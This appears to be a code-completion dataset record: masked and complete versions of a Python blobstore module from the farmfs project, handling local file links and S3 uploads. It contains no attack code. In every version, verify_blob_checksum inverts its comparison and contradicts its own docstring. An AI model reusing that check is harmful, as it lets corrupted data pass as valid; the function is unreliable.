"step-2": "<mask token>\n\n\nclass FileBlobstore:\n <mask token>\n\n def _csum_to_name(self, csum):\n \"\"\"Return string name of link relative to root\"\"\"\n return _checksum_to_path(csum)\n <mask token>\n\n def exists(self, csum):\n blob = self.csum_to_path(csum)\n return blob.exists()\n\n def delete_blob(self, csum):\n \"\"\"Takes a csum, and removes it from the blobstore\"\"\"\n blob_path = self.csum_to_path(csum)\n blob_path.unlink(clean=self.root)\n <mask token>\n\n def fetch_blob(self, remote, csum):\n src_blob = remote.csum_to_path(csum)\n dst_blob = self.csum_to_path(csum)\n duplicate = dst_blob.exists()\n if not duplicate:\n ensure_copy(dst_blob, src_blob)\n <mask token>\n <mask token>\n <mask token>\n\n def verify_blob_checksum(self, blob):\n \"\"\"Returns True when the blob's checksum matches. Returns False when there is a checksum corruption.\"\"\"\n path = self.csum_to_path(blob)\n csum = path.checksum()\n return csum != blob\n <mask token>\n\n\nclass S3Blobstore:\n\n def __init__(self, bucket, prefix, access_id, secret):\n self.bucket = bucket\n self.prefix = prefix\n self.access_id = access_id\n self.secret = secret\n\n def blobs(self):\n \"\"\"Iterator across all blobs\"\"\"\n\n def blob_iterator():\n with s3conn(self.access_id, self.secret) as s3:\n key_iter = s3.list_bucket(self.bucket, prefix=self.prefix + '/'\n )\n for key in key_iter:\n blob = key[len(self.prefix) + 1:]\n yield blob\n return blob_iterator\n\n def blob_stats(self):\n \"\"\"Iterator across all blobs, retaining the listing information\"\"\"\n\n def blob_iterator():\n with s3conn(self.access_id, self.secret) as s3:\n key_iter = s3.list_bucket2(self.bucket, prefix=self.prefix +\n '/')\n for head in key_iter:\n blob = head[LIST_BUCKET_KEY][len(self.prefix) + 1:]\n head['blob'] = blob\n yield head\n return blob_iterator\n\n def read_handle(self):\n \"\"\"Returns a file like object which has the blob's contents\"\"\"\n raise NotImplementedError()\n\n def upload(self, csum, path):\n key = self.prefix + '/' + csum\n\n def uploader():\n with path.open('rb') as f:\n with s3conn(self.access_id, self.secret) as s3:\n result = s3.put_object(self.bucket, key, f)\n return result\n http_success = lambda status_headers: status_headers[0\n ] >= 200 and status_headers[0] < 300\n s3_exception = lambda e: isinstance(e, ValueError)\n upload_repeater = repeater(uploader, max_tries=3, predicate=\n http_success, catch_predicate=s3_exception)\n return upload_repeater\n",
"step-3": "<mask token>\n\n\nclass FileBlobstore:\n\n def __init__(self, root, num_segs=3):\n self.root = root\n self.reverser = reverser(num_segs)\n\n def _csum_to_name(self, csum):\n \"\"\"Return string name of link relative to root\"\"\"\n return _checksum_to_path(csum)\n\n def csum_to_path(self, csum):\n \"\"\"Return absolute Path to a blob given a csum\"\"\"\n return Path(self._csum_to_name(csum), self.root)\n\n def exists(self, csum):\n blob = self.csum_to_path(csum)\n return blob.exists()\n\n def delete_blob(self, csum):\n \"\"\"Takes a csum, and removes it from the blobstore\"\"\"\n blob_path = self.csum_to_path(csum)\n blob_path.unlink(clean=self.root)\n <mask token>\n\n def fetch_blob(self, remote, csum):\n src_blob = remote.csum_to_path(csum)\n dst_blob = self.csum_to_path(csum)\n duplicate = dst_blob.exists()\n if not duplicate:\n ensure_copy(dst_blob, src_blob)\n\n def link_to_blob(self, path, csum):\n \"\"\"Forces path into a symlink to csum\"\"\"\n new_link = self.csum_to_path(csum)\n ensure_symlink(path, new_link)\n ensure_readonly(path)\n\n def blobs(self):\n \"\"\"Iterator across all blobs\"\"\"\n blobs = pipeline(ftype_selector([FILE]), fmap(first), fmap(self.\n reverser))(self.root.entries())\n return blobs\n <mask token>\n\n def verify_blob_checksum(self, blob):\n \"\"\"Returns True when the blob's checksum matches. Returns False when there is a checksum corruption.\"\"\"\n path = self.csum_to_path(blob)\n csum = path.checksum()\n return csum != blob\n <mask token>\n\n\nclass S3Blobstore:\n\n def __init__(self, bucket, prefix, access_id, secret):\n self.bucket = bucket\n self.prefix = prefix\n self.access_id = access_id\n self.secret = secret\n\n def blobs(self):\n \"\"\"Iterator across all blobs\"\"\"\n\n def blob_iterator():\n with s3conn(self.access_id, self.secret) as s3:\n key_iter = s3.list_bucket(self.bucket, prefix=self.prefix + '/'\n )\n for key in key_iter:\n blob = key[len(self.prefix) + 1:]\n yield blob\n return blob_iterator\n\n def blob_stats(self):\n \"\"\"Iterator across all blobs, retaining the listing information\"\"\"\n\n def blob_iterator():\n with s3conn(self.access_id, self.secret) as s3:\n key_iter = s3.list_bucket2(self.bucket, prefix=self.prefix +\n '/')\n for head in key_iter:\n blob = head[LIST_BUCKET_KEY][len(self.prefix) + 1:]\n head['blob'] = blob\n yield head\n return blob_iterator\n\n def read_handle(self):\n \"\"\"Returns a file like object which has the blob's contents\"\"\"\n raise NotImplementedError()\n\n def upload(self, csum, path):\n key = self.prefix + '/' + csum\n\n def uploader():\n with path.open('rb') as f:\n with s3conn(self.access_id, self.secret) as s3:\n result = s3.put_object(self.bucket, key, f)\n return result\n http_success = lambda status_headers: status_headers[0\n ] >= 200 and status_headers[0] < 300\n s3_exception = lambda e: isinstance(e, ValueError)\n upload_repeater = repeater(uploader, max_tries=3, predicate=\n http_success, catch_predicate=s3_exception)\n return upload_repeater\n",
"step-4": "<mask token>\n\n\nclass Blobstore:\n <mask token>\n\n\nclass FileBlobstore:\n\n def __init__(self, root, num_segs=3):\n self.root = root\n self.reverser = reverser(num_segs)\n\n def _csum_to_name(self, csum):\n \"\"\"Return string name of link relative to root\"\"\"\n return _checksum_to_path(csum)\n\n def csum_to_path(self, csum):\n \"\"\"Return absolute Path to a blob given a csum\"\"\"\n return Path(self._csum_to_name(csum), self.root)\n\n def exists(self, csum):\n blob = self.csum_to_path(csum)\n return blob.exists()\n\n def delete_blob(self, csum):\n \"\"\"Takes a csum, and removes it from the blobstore\"\"\"\n blob_path = self.csum_to_path(csum)\n blob_path.unlink(clean=self.root)\n\n def import_via_link(self, path, csum):\n \"\"\"Adds a file to a blobstore via a hard link.\"\"\"\n blob = self.csum_to_path(csum)\n duplicate = blob.exists()\n if not duplicate:\n ensure_link(blob, path)\n ensure_readonly(blob)\n return duplicate\n\n def fetch_blob(self, remote, csum):\n src_blob = remote.csum_to_path(csum)\n dst_blob = self.csum_to_path(csum)\n duplicate = dst_blob.exists()\n if not duplicate:\n ensure_copy(dst_blob, src_blob)\n\n def link_to_blob(self, path, csum):\n \"\"\"Forces path into a symlink to csum\"\"\"\n new_link = self.csum_to_path(csum)\n ensure_symlink(path, new_link)\n ensure_readonly(path)\n\n def blobs(self):\n \"\"\"Iterator across all blobs\"\"\"\n blobs = pipeline(ftype_selector([FILE]), fmap(first), fmap(self.\n reverser))(self.root.entries())\n return blobs\n\n def read_handle(self):\n \"\"\"Returns a file like object which has the blob's contents\"\"\"\n raise NotImplementedError()\n\n def verify_blob_checksum(self, blob):\n \"\"\"Returns True when the blob's checksum matches. Returns False when there is a checksum corruption.\"\"\"\n path = self.csum_to_path(blob)\n csum = path.checksum()\n return csum != blob\n\n def verify_blob_permissions(self, blob):\n \"\"\"Returns True when the blob's permissions is read only. Returns False when the blob is mutable.\"\"\"\n path = self.csum_to_path(blob)\n return is_readonly(path)\n\n\nclass S3Blobstore:\n\n def __init__(self, bucket, prefix, access_id, secret):\n self.bucket = bucket\n self.prefix = prefix\n self.access_id = access_id\n self.secret = secret\n\n def blobs(self):\n \"\"\"Iterator across all blobs\"\"\"\n\n def blob_iterator():\n with s3conn(self.access_id, self.secret) as s3:\n key_iter = s3.list_bucket(self.bucket, prefix=self.prefix + '/'\n )\n for key in key_iter:\n blob = key[len(self.prefix) + 1:]\n yield blob\n return blob_iterator\n\n def blob_stats(self):\n \"\"\"Iterator across all blobs, retaining the listing information\"\"\"\n\n def blob_iterator():\n with s3conn(self.access_id, self.secret) as s3:\n key_iter = s3.list_bucket2(self.bucket, prefix=self.prefix +\n '/')\n for head in key_iter:\n blob = head[LIST_BUCKET_KEY][len(self.prefix) + 1:]\n head['blob'] = blob\n yield head\n return blob_iterator\n\n def read_handle(self):\n \"\"\"Returns a file like object which has the blob's contents\"\"\"\n raise NotImplementedError()\n\n def upload(self, csum, path):\n key = self.prefix + '/' + csum\n\n def uploader():\n with path.open('rb') as f:\n with s3conn(self.access_id, self.secret) as s3:\n result = s3.put_object(self.bucket, key, f)\n return result\n http_success = lambda status_headers: status_headers[0\n ] >= 200 and status_headers[0] < 300\n s3_exception = lambda e: isinstance(e, ValueError)\n upload_repeater = repeater(uploader, max_tries=3, predicate=\n http_success, catch_predicate=s3_exception)\n return upload_repeater\n",
"step-5": "from farmfs.fs import Path, ensure_link, ensure_readonly, ensure_symlink, ensure_copy, ftype_selector, FILE, is_readonly\nfrom func_prototypes import typed, returned\nfrom farmfs.util import safetype, pipeline, fmap, first, compose, invert, partial, repeater\nfrom os.path import sep\nfrom s3lib import Connection as s3conn, LIST_BUCKET_KEY\nimport re\n\n_sep_replace_ = re.compile(sep)\n@returned(safetype)\n@typed(safetype)\ndef _remove_sep_(path):\n return _sep_replace_.subn(\"\",path)[0]\n\n#TODO we should remove references to vol.bs.reverser, as thats leaking format information into the volume.\ndef reverser(num_segs=3):\n \"\"\"Returns a function which takes Paths into the user data and returns csums.\"\"\"\n r = re.compile(\"((\\/([0-9]|[a-f])+){%d})$\" % (num_segs+1))\n def checksum_from_link(link):\n \"\"\"Takes a path into the userdata, returns the matching csum.\"\"\"\n m = r.search(safetype(link))\n if (m):\n csum_slash = m.group()[1:]\n csum = _remove_sep_(csum_slash)\n return csum\n else:\n raise ValueError(\"link %s checksum didn't parse\" %(link))\n return checksum_from_link\n\n@returned(safetype)\n@typed(safetype, int, int)\ndef _checksum_to_path(checksum, num_segs=3, seg_len=3):\n segs = [ checksum[i:i+seg_len] for i in range(0, min(len(checksum), seg_len * num_segs), seg_len)]\n segs.append(checksum[num_segs*seg_len:])\n return sep.join(segs)\n\nclass Blobstore:\n def __init__(self):\n raise NotImplementedError()\n\nclass FileBlobstore:\n def __init__(self, root, num_segs=3):\n self.root = root\n self.reverser = reverser(num_segs)\n\n def _csum_to_name(self, csum):\n \"\"\"Return string name of link relative to root\"\"\"\n #TODO someday when csums are parameterized, we inject the has params here.\n return _checksum_to_path(csum)\n\n def csum_to_path(self, csum):\n \"\"\"Return absolute Path to a blob given a csum\"\"\"\n #TODO remove callers so we can make internal.\n return Path(self._csum_to_name(csum), self.root)\n\n def exists(self, csum):\n blob = self.csum_to_path(csum)\n return blob.exists()\n\n def delete_blob(self, csum):\n \"\"\"Takes a csum, and removes it from the blobstore\"\"\"\n blob_path = self.csum_to_path(csum)\n blob_path.unlink(clean=self.root)\n\n def import_via_link(self, path, csum):\n \"\"\"Adds a file to a blobstore via a hard link.\"\"\"\n blob = self.csum_to_path(csum)\n duplicate = blob.exists()\n if not duplicate:\n ensure_link(blob, path)\n ensure_readonly(blob)\n return duplicate\n\n def fetch_blob(self, remote, csum):\n src_blob = remote.csum_to_path(csum)\n dst_blob = self.csum_to_path(csum)\n duplicate = dst_blob.exists()\n if not duplicate:\n ensure_copy(dst_blob, src_blob)\n\n def link_to_blob(self, path, csum):\n \"\"\"Forces path into a symlink to csum\"\"\"\n new_link = self.csum_to_path(csum)\n ensure_symlink(path, new_link)\n ensure_readonly(path)\n\n def blobs(self):\n \"\"\"Iterator across all blobs\"\"\"\n blobs = pipeline(\n ftype_selector([FILE]),\n fmap(first),\n fmap(self.reverser),\n )(self.root.entries())\n return blobs\n\n def read_handle(self):\n \"\"\"Returns a file like object which has the blob's contents\"\"\"\n raise NotImplementedError()\n\n def verify_blob_checksum(self, blob):\n \"\"\"Returns True when the blob's checksum matches. Returns False when there is a checksum corruption.\"\"\"\n path = self.csum_to_path(blob)\n csum = path.checksum()\n return csum != blob\n\n def verify_blob_permissions(self, blob):\n \"\"\"Returns True when the blob's permissions is read only. Returns False when the blob is mutable.\"\"\"\n path = self.csum_to_path(blob)\n return is_readonly(path)\n\n\nclass S3Blobstore:\n def __init__(self, bucket, prefix, access_id, secret):\n self.bucket = bucket\n self.prefix = prefix\n self.access_id = access_id\n self.secret = secret\n\n def blobs(self):\n \"\"\"Iterator across all blobs\"\"\"\n def blob_iterator():\n with s3conn(self.access_id, self.secret) as s3:\n key_iter = s3.list_bucket(self.bucket, prefix=self.prefix+\"/\")\n for key in key_iter:\n blob = key[len(self.prefix)+1:]\n yield blob\n return blob_iterator\n\n def blob_stats(self):\n \"\"\"Iterator across all blobs, retaining the listing information\"\"\"\n def blob_iterator():\n with s3conn(self.access_id, self.secret) as s3:\n key_iter = s3.list_bucket2(self.bucket, prefix=self.prefix+\"/\")\n for head in key_iter:\n blob = head[LIST_BUCKET_KEY][len(self.prefix)+1:]\n head['blob'] = blob\n yield head\n return blob_iterator\n\n def read_handle(self):\n \"\"\"Returns a file like object which has the blob's contents\"\"\"\n raise NotImplementedError()\n\n def upload(self, csum, path):\n key = self.prefix + \"/\" + csum\n def uploader():\n with path.open('rb') as f:\n with s3conn(self.access_id, self.secret) as s3:\n #TODO should provide pre-calculated md5 rather than recompute.\n result = s3.put_object(self.bucket, key, f)\n return result\n http_success = lambda status_headers: status_headers[0] >=200 and status_headers[0] < 300\n s3_exception = lambda e: isinstance(e, ValueError)\n upload_repeater = repeater(uploader, max_tries = 3, predicate = http_success, catch_predicate = s3_exception)\n return upload_repeater\n",
"step-ids": [
8,
12,
16,
20,
27
]
}
|
[
8,
12,
16,
20,
27
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.